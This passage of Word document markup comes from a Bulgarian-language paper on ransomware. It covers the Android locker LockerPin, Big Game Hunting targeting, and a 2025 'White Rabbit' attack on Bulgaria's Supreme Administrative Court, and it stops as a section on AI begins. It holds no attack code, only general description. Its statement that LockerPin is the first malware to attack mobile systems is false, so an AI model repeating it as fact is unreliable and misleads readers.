          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc224154932"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Android </w:t>
      </w:r>
      <w:r>
        <w:t>базирани системи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7F5C2CE6" w14:textId="381864B0" w:rsidR="00045AD6" w:rsidRDefault="00953056" w:rsidP="000053EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00436818">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LockerPin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00436818">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е първият </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:r>
        <w:t>, който атакува мобилни системи.</w:t>
      </w:r>
      <w:r w:rsidR="00F04F17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F04F17" w:rsidRPr="00F04F17">
        <w:t>Векторът на заразяване е изтеглянето на мобилни приложения от пиратски сайтове, в които е вграден троянският кон</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEFC76" w14:textId="7C38D3A2" w:rsidR="00D44C22" w:rsidRDefault="00D44C22" w:rsidP="00045AD6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Троянският кон се опитва </w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t xml:space="preserve">да </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">получи </w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t>административни правомощия</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t xml:space="preserve"> маскирайки се като софтуерен ъпдейт на телефона </w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t>фиг</w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t>6)</w:t>
      </w:r>
      <w:r w:rsidR="00953056">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00366161">
        <w:t xml:space="preserve"> Ако потребителят се подведе и изпълни указанията се сменя </w:t>
      </w:r>
      <w:r w:rsidR="00366161">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PIN</w:t>
      </w:r>
      <w:r w:rsidR="0033715D">
        <w:t xml:space="preserve"> кода</w:t>
      </w:r>
      <w:r w:rsidR="00366161">
        <w:t xml:space="preserve"> на телефона.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E7BC3" w14:textId="7B31D41F" w:rsidR="00953056" w:rsidRPr="00366161" w:rsidRDefault="00366161" w:rsidP="00D44C22">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Единственият начин да си възстанови достъпа е, ако </w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>мобилното устройство</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> се </w:t>
      </w:r>
      <w:r w:rsidR="00D44C22">
        <w:t xml:space="preserve">преинсталира обратно до </w:t>
      </w:r>
      <w:r>
        <w:t>фабрични настройки. Това означава пълно изтриване на данни</w:t>
      </w:r>
      <w:r w:rsidR="00D44C22">
        <w:t>те на устройството</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D44C22">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> кодът е неизвестен дори и на хакера</w:t>
      </w:r>
      <w:r w:rsidR="00D44C22">
        <w:t>, тъй като е случайно генерирано число</w:t>
      </w:r>
      <w:r w:rsidR="000A2FAB">
        <w:t>, следователно откупването е безполезно.</w:t>
      </w:r>
      <w:r w:rsidR="00962853">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76354FF5" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="00366161" w:rsidP="008874DA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDBEF8F" wp14:editId="5F4DC86F">
            <wp:extent cx="2838734" cy="5047439"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="744506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064" cy="505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3107" w14:textId="4C911C63" w:rsidR="00953056" w:rsidRPr="00953056" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc223382612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6</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00360E87">
        <w:t>Троянски ко</w:t>
      </w:r>
      <w:r w:rsidR="003A405B">
        <w:t>н,</w:t>
      </w:r>
      <w:r w:rsidRPr="00360E87">
        <w:t xml:space="preserve"> маскиран като софтуерен ъпдейт.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5E7DE2FE" w14:textId="77777777" w:rsidR="000053EC" w:rsidRDefault="000053EC">
      <w:pPr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33D9F93" w14:textId="77777777" w:rsidR="00631094" w:rsidRDefault="000053EC" w:rsidP="000053EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc224154933"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="41AE8056" w14:textId="0820FAB3" w:rsidR="00631094" w:rsidRDefault="00631094" w:rsidP="00631094">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EEDDA84" wp14:editId="410E2546">
            <wp:extent cx="5760720" cy="2555875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="238318372" name="Picture 3" descr="model of how big game hunting ransomware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del of how big game hunting ransomware work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B3A9" w14:textId="2A16362F" w:rsidR="00631094" w:rsidRPr="00631094" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc223382613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7</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52B14">
        <w:t xml:space="preserve">Модел на заплахите в Big </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52B14">
        <w:t>Game</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52B14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52B14">
        <w:t>Hunting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="47A0A403" w14:textId="77777777" w:rsidR="000A2FAB" w:rsidRDefault="000A2FAB" w:rsidP="00D40D36">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="005D10CC">
        <w:t xml:space="preserve"> операторите променят стратегията си</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за създаване на по-силни атаки</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="005D10CC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t>Те се отказват от метода „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t>spray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t>pray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t>“, при който зловредният софтуер се разпространява масово без конкретен избор на</w:t>
      </w:r>
      <w:r w:rsidRPr="003A405B">
        <w:t xml:space="preserve"> потърпевш</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t xml:space="preserve">. Вместо това започват да таргетират конкретни организации и потребители, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A405B">
        <w:t>което е</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:t xml:space="preserve"> известно още като</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC" w:rsidRPr="003A405B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Big Game Hunting.</w:t>
      </w:r>
      <w:r w:rsidR="005D10CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498CBBB" w14:textId="719BDCFA" w:rsidR="00D40D36" w:rsidRDefault="00BE07A7" w:rsidP="00D40D36">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>При „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>spray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>pray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>" метода откупът е сравнително малък – стандартно около 300 долара, тъй като случайно избраните</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>трудно биха платили по</w:t>
      </w:r>
      <w:r w:rsidR="00903BD9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE07A7">
        <w:t>висока сума</w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E">
        <w:t xml:space="preserve">. От друга страна, при </w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E" w:rsidRPr="001E6D9E">
        <w:t xml:space="preserve">Big </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E6D9E" w:rsidRPr="001E6D9E">
        <w:t>Game</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E6D9E" w:rsidRPr="001E6D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E6D9E" w:rsidRPr="001E6D9E">
        <w:t>Hunting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E6D9E" w:rsidRPr="001E6D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D10CC">
        <w:t>откупи</w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E">
        <w:t xml:space="preserve">те достигат </w:t>
      </w:r>
      <w:r w:rsidR="005D10CC">
        <w:t>десетки хиляди</w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E">
        <w:t xml:space="preserve"> долари, защото на риск са изложени подбрани компании и обекти. </w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve">Такива жертви са </w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>River Beach</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D40D36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TravelEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve">, заплатили съответно 600 </w:t>
      </w:r>
      <w:r w:rsidR="000A2FAB">
        <w:t xml:space="preserve">хил. </w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E">
        <w:t>долара</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve">млн. </w:t>
      </w:r>
      <w:r w:rsidR="001E6D9E">
        <w:t>долара</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000A2FAB">
        <w:t xml:space="preserve"> Атаката и в двата примера е една и съща -</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve"> изтегляне на </w:t>
      </w:r>
      <w:r w:rsidR="000A2FAB">
        <w:t>неверифицирани</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve"> файлове през</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phishing</w:t>
      </w:r>
      <w:r w:rsidR="00D40D36">
        <w:t xml:space="preserve"> имейл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48026AAB" w14:textId="29DD7708" w:rsidR="00BA2498" w:rsidRDefault="00D40D36" w:rsidP="00D40D36">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На фигура 7 е показан модела на атаката в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">BGH. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се </w:t>
      </w:r>
      <w:r w:rsidR="00A85F71">
        <w:t>заразят</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> възможно най-много системи. </w:t>
      </w:r>
      <w:r w:rsidR="00A85F71">
        <w:t>Следва</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A85F71">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy </w:t>
      </w:r>
      <w:r w:rsidR="00A85F71">
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidR="00A85F71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA6CCD">
        <w:t xml:space="preserve">се изисква </w:t>
      </w:r>
      <w:r>
        <w:t>откуп в биткойни.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C4234" w14:textId="77777777" w:rsidR="00BA2498" w:rsidRDefault="00BA2498">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26AD92" w14:textId="771BB4C2" w:rsidR="00231BD5" w:rsidRPr="00BA2498" w:rsidRDefault="00BA2498" w:rsidP="00BA2498">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc224154934"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в България</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="326840C4" w14:textId="0CA129E5" w:rsidR="006C54F4" w:rsidRPr="006C54F4" w:rsidRDefault="00025D20" w:rsidP="00025D20">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">През 2025 г. Върховният административен съд на България (ВАС) става жертва на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>рансъмуер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> атака, известна още като: „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>White Rabbit</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(бял заек).</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> „Белият заек“ е малък по</w:t>
      </w:r>
      <w:r w:rsidR="009F3DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t>размер (около 100</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> KB</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">) и не е </w:t>
      </w:r>
      <w:r w:rsidR="00205FD0">
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">хванат от антивирусната система. За да започне </w:t>
      </w:r>
      <w:r w:rsidR="00B47066">
        <w:t>атаката</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> трябва да бъде въведена парола, която е известна само на хакерите.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">При активиране </w:t>
      </w:r>
      <w:r w:rsidR="00451424">
        <w:t xml:space="preserve">се </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t>криптира</w:t>
      </w:r>
      <w:r w:rsidR="006A4850">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> файлове</w:t>
      </w:r>
      <w:r w:rsidR="00B456D7">
        <w:t>те,</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> изключв</w:t>
      </w:r>
      <w:r w:rsidR="006A4850">
        <w:t xml:space="preserve">ат се </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">системните </w:t>
      </w:r>
      <w:r w:rsidR="00C17C50">
        <w:t xml:space="preserve">директории </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidR="00B456D7">
        <w:t xml:space="preserve"> потребителите са уведомени</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t>, че са обект на атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6AC8EA" w14:textId="711EB1E0" w:rsidR="00231BD5" w:rsidRDefault="00025D20" w:rsidP="006C54F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атаката срива за седмици единната деловодна информационна система, използвана от всички административни съдилища </w:t>
      </w:r>
      <w:r w:rsidR="00E864F1">
        <w:t>в</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> страната. Причина за </w:t>
      </w:r>
      <w:r w:rsidR="00DE1B16">
        <w:t>пробива</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вирус</w:t>
      </w:r>
      <w:r w:rsidR="001F1AEB">
        <w:t>ът</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернет</w:t>
      </w:r>
      <w:r w:rsidR="00505B76">
        <w:t xml:space="preserve"> пространството</w:t>
      </w:r>
      <w:r>
        <w:t>. Единствените устройства, които остават невредими са тези, които не са били включени в интернет мрежата.</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve"> Не е известно дали ВАС е заплатил откупа, но Висшият съ</w:t>
      </w:r>
      <w:r w:rsidR="00B47066">
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00B47066">
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t xml:space="preserve">ен съвет гласува близо 1.6 млн. лева за закупуването на нови </w:t>
      </w:r>
      <w:r w:rsidR="00B47066">
        <w:t>сървъри</w:t>
      </w:r>
      <w:r w:rsidR="006C54F4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00823414">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1325554063"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:instrText xml:space="preserve"> CITATION Чов25 \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-799767334"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Бял30 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1973169161"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Бял \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00231BD5">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C8D49" w14:textId="00EFE92B" w:rsidR="006963F5" w:rsidRPr="00231BD5" w:rsidRDefault="00231BD5" w:rsidP="00231BD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc224154935"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ролята на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AI </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаките</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7119F1B8" w14:textId="4609FB34" w:rsidR="00575D22" w:rsidRDefault="00231BD5" w:rsidP="00231BD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00231BD5">
        <w:t xml:space="preserve">Използването на изкуствен интелект (ИИ) открива нов фронт в продължаващата борба срещу </w:t>
      </w:r>
